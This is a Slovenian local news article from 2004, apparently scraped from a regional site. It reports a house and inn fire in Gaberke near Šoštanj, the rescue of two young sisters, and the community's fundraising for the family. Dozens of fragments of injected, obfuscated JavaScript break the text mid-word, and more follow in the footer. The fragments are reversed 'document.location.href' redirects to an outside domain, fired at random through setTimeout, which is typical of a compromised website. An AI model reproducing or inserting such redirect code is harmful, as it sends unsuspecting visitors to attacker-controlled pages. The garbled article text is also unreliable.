Samo še hrčki so žalosten spomin na RDECEGA PETELINA

Nedeljski DNEVNIK: Nedelja, 18.1.2004  

SOLIDARNOST SE JE SPET IZKAZALA, KRIŽNIKOVI IZ GABERK PRI ŠOŠTANJU, KI SO POGORELI PRED MESECEM DNI, ŽE POSPEŠENO ZIDAJO


Samo še hrčki so žalosten spomin na RDECEGA PETELINA


Ko je zagorelo, sta bili deklici sicer v stanovanju, a strahu in travm ni več – Enega otroka rešila natakarica, drugega pogumni gasilec – Uničena dom in gostilna – Pomoč prihaja z vseh strani – Tudi v sosednji razborski fari so zbirali za Petro in And Izkazali so se vsi, od prijateljev do šole in staršev dekličinih sošolk in sošolcev


Tistega usodnega večera sta devetletna Petra in njena letobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to mlajša sestrica Andreja že polagoma tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tonili v sen, ko je na drugem koncu stanovanja začelo goreti. Iz ostrešja se je že pošteno kadilo, ko je v Križnikovo gostilno, kjer so trije domačini brezskrbno kvartali, planil četrti in zavpil, da “kukrle gori”, a ga nihče ni jemal resno, češ, najbrž se mu sanja. Ni se dal, še enkrat je pogledal proti strehi, potem pa stekel do bližnjega gasilskega doma, kjer so gasilci kot nalašč sedeli za mizo in sestankovali. Nemudoma se je oglasila sirena in akcija gašenja je stekla. A je bilo že prepozno, ker so podivjani ognjeni zublji medtem zajeli vse ostrešje. Zagorelo je kot ogromna bakla. čez balkon so v naslednjih minutah rešili prestrašeni deklici, plameni pa so ušli nadzoru in nadaljevali svoj uničevalni pohod.


Križnikovi deklici iz vasi Gaberke nedaleč od Šoštanja se vsega še prav dobro spomnita, a požar, ki jim je tretjega decembra lani uničil dom, v njunih glavicah na srečo ni pustil kakšnih hujših posledic, vsaj za zdaj še ne.


Da sta le deklici rešeni!



“Slišala sem nekakšno šumenje, nekaj se je dogajalo s posterji na steni, mislim, da so že tleli ali kaj, strah me je zagrabil, v sami pižamici sem stekla na balkon,” pripoveduje starejša Petra . Malo zatem jo je rešila natakarica, ki je ta večer delala v njihovi gostilni. Tudi mlajša Andreja se je prebudila, a si ni upala iz postelje. Z odejo se je pokrila čez glavo in čakala, kaj bo. Prišel je gasilec z masko, neznanec, grozen je bil videti, pošteno se ga je prestrašila, zatobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to se še malo bolj zarila med rjuhe, a ko ji je povedal, da je ati Petrine sošolke Barbare in da se naj nič ne boji, je od sreče in olajšanja kar skočilo nanj, potem pa sta se urno spustila po lestvi na varno.


Dekličina starša Metka in Andrej Križnik , tamkajšnja gostilničarja, sta kmalu zatem vsa iz sebe pridrvela pred gorečo hišo, polno gasilcev in brizgaln, ko ni bilo več kaj pomagati, rešiti pa še manj. Ravno tisti večer sta na Vransko peljala klobase v sušilnico “zelhat”.


“Mož, ki je po osnovnem poklicu mesar, me je pregovoril, da sem šla z njim. Dekleti, ki sta vajeni sami zaspati in ki sta tudi sicer dokaj samostobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tojni, sta bili vsaka v svoji sobici, midva pa sva se ravno vračala proti domu, ko so nama sporočili, da pri nas doma gori. Prenosni telefon sva imela skoraj prazen, bilo je grozno, sploh ne vem, kako sva se pripeljala v Gaberke, zanesljivo pa, kot bi letela po zraku. Na srečo vsaj otrokoma ni bilo nič,” še vedno pretresena pripoveduje enaintridesetletna Metka Križnik.


Dobri ljudje ne počivajo



Le s tistim, kar sta imeli na sebi, sta se Križnikovi punčki rešili pred ognjem. Ko sta prišla mamica in ati, sta že bili pri sosedih na tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toplem. “Zunaj je tistobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to noč rezalo do kosti, kajti bil je hud mraz, ki je nagajal gasilcem in še posebej vodi v ceveh. Bolj ko so fantje gasili, bolj je gorelo,” se spomni njuna mamica.


Že naslednje jutro, ko se dim še niti ni dobro polegel, je stekla v domači vasi in na vsem šoštanjskem koncu obsežna akcija pomoči nesrečni družini. Križnikovim je povsem pogorelo stanovanje in vse, kar so imeli v njem. Zaradi vode in črnih saj je nastalo precej škode tudi v pritličju, kjer je njihova gostilna.


“To je od vsega še najhuje,” ugotavljata Križnikova. Gostilna ni odprta, zaslužka ni nobenega, in tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to ravno zdaj, ko najbolj potrebujejo denar. Vzrok požara še ni pojasnjen. Ognjena ujma je uničila tudi sosedovo ostrešje, škoda je ogromna, seveda precej višja od petih milijonov tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tolarjev, za kolikor so jo sprva ocenjevali. Še huje je tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to, da Križnikova hiše nista imela zavarovane, celo več, še kakšno letobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to morata odplačevati posojilo zanjo. Prihranke z dnevnim izkupičkom sta imela zgoraj v železni blagajni, zatobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to je denar zgorel in del je krepko ožgan. Upata, da jima bo banka vsaj del te vsote nekako povrnila.


Sicer pa se je solidarnost tudi v njihovem primeru izjemno izkazala. Njihov prijatelj jim je nemudoma odstobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}topil obnovljeno hišo v Šoštanju, da so lahko na tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toplem in varnem. Nikamor jih ne podi, pod njegovo streho lahko ostanejo, kolikor dolgo hočejo. Prav ganljivo je, kako skrbi zanje. “Še računov nam ne pusti plačati. Pride njegovo dekle in položnice kar lepo vzame s seboj,” ne pozabi omeniti Metka in prizna, da so vse dni v Gaberkah, kjer so zgornje nadstropje medtem že pozidali, ostrešje je novo, strešna opeka bo še prišla na vrstobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to


Obnova se je kljub zimi in mrazu razmahnila, seveda z denarjem in drugo pomočjo, ki pritekata že domala mesec dni. Obnavljajo s solidarnostnim denarjem, ki so ga zbirali in ga še vedno zbirajo Rdeči križ, člani Kulturnega društva Razbor in kulturnica Gaberke, znana po vsakoletnih kravjih dirkah. Domala vsi avtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toprevozniki s širšega območja so prispevali po petdeset tisočakov, gabrška krajevna skupnost je odprla poseben račun za prizadete in Metka je poslovnim partnerjem in podjetjem te dni poslala najmanj stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to prošenj za pomoč, in tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to ne brez odmeva, kajti nekaj denarja je že na računu. V teh dneh bosta v Šoštanju in čez teden dni še v njihovi vasi koncerta narodnozabavne glasbe in ves izkupiček bo šel za obnovo po požaru. Izkazala se je šoštanjska osnovna šola, saj sta tretješolka Petra in drugošolka Andreja dobili nove šolske potrebščine, ker je stare pogoltnil ogenj in uničila voda. Seveda so se izkazali tudi starši sošolcev, ki so deklici dobesedno zasuli z oblačili in obutvijo. “Kar smo uspeli rešiti, tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to je nekaj obleke in kakšno igračko, je vse ožgano in s sledovi črnih saj ali pa tako poškodovano, da ni več uporabno.”


Križnikove čaka v novem letu ogromno dela. Te dni bodo prišli elektrikarji ter za njimi novi in novi mojstri. “Najprej moramo ,zalavfati’gostilno,” pravi Andrej. “Ko bomo odprli in začeli delati, bo tudi denar. Z njim in s solidarnostnimi sredstvi bomo lahko obnovili stanovanje, vendar bo trajalo še kakšno letobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to, da se bomo lahko vselili.” Medtem pa? “Da bi le deklici bili zdravi in požar ne bi pustil na njiju kakšnih globljih posledic,” si želi njuna mama. Ob vsem, kar jih je doletelo, je srečna, da je v slabem mesecu dni, kar so pogoreli, spoznala tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toliko dobrih, resnično plemenitih ljudi. “če jih ne bi bilo, bi se z možem še vedno mučila z osmojenimi letvami in tramovi ter počeno opeko. Z njihovo pomočjo smo pogorišče pospravili v dnevu, dveh.”


Petra in Andreja sta zgovorni in nasmejani. O kakih travmah in strahovih za zdaj ni ne duha ne sluha. Mami pravi: “Še imenitno se jima je zdelo, ko smo se na vrat na nos selili v Šoštanj, kajti tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to je bilo zanju doživetje in spet nekaj novega. No ja, zdaj si spet želita nazaj v Gaberke, ker pogrešata svoji sobici, igračke, ljube stvari. Ko gresta spat, mora biti televizor ugasnjen, vrata pa odprta.” Na srečo sta hišna ljubljenčka, muca Mika in kužka Pika, ostala živa, četudi hudo prestrašena. “Najini hrčki so pa zgoreli v hiši. Žal nama je, a ko se bomo vrnili, jih bova spet lahko imeli. A ne, mami?” 

Sostanj.info3758 Posts

Razpis TEŠ

Standom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and up za Duškota

0 komentarjev

Komentirajte

Login

Welcome! Login in to your account

Remember me Lost your password?

Don't have account. Register

Lost Password

Register

Na naši stran uporabljamo piškotke za pravilno delovanje strani in beleženje obiskanosti strani. S strinjanjem nam dovolite uporabo piškotkov.

Zasebne nastavitve shranjene!
Nastavitve zasebnosti

Ko obiščete katero koli spletno mesto, le to lahko shranjuje ali pridobi podatke v vašem brskalniku, večinoma v obliki piškotkov. Tukaj nadzirate svoje osebne nastavitce za piškotke.

Ti piškotki so potrebni za delovanje spletnega mesta in jih ni moč onemogočiti.

Za pravilno delovanje spletne strani uporabljamo naslednje tehnične piškotke:

Zavrni vse piškotke
Dovoli vse piškotki